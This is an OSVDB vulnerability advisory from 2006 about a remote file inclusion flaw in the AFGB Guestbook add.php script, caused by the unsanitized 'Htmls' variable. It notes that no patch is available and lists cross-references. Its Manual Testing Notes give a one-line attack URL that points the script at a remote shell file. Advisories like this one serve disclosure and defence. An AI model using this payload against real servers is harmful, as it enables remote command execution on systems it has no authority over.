AFGB Guestbook add.php Htmls Variable Remote File Inclusion

2006-10-12T04:49:10
ID OSVDB:29725
Type osvdb
Reporter mdx(bilkopat@hotmail.com)
Modified 2006-10-12T04:49:10

Description

Vulnerability Description

AFGB Guestbook contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to add.php not properly sanitizing user input supplied to the 'Htmls' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

AFGB Guestbook contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to add.php not properly sanitizing user input supplied to the 'Htmls' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[path]/add.php?Htmls=http://shell.txt?

References:

Vendor URL: http://www.afgb.to/ Secunia Advisory ID:22363 Related OSVDB ID: 29727 Related OSVDB ID: 29728 Related OSVDB ID: 29726 ISS X-Force ID: 29511 Generic Exploit URL: http://www.milw0rm.com/exploits/2529 FrSIRT Advisory: ADV-2006-4047 CVE-2006-5307 Bugtraq ID: 20503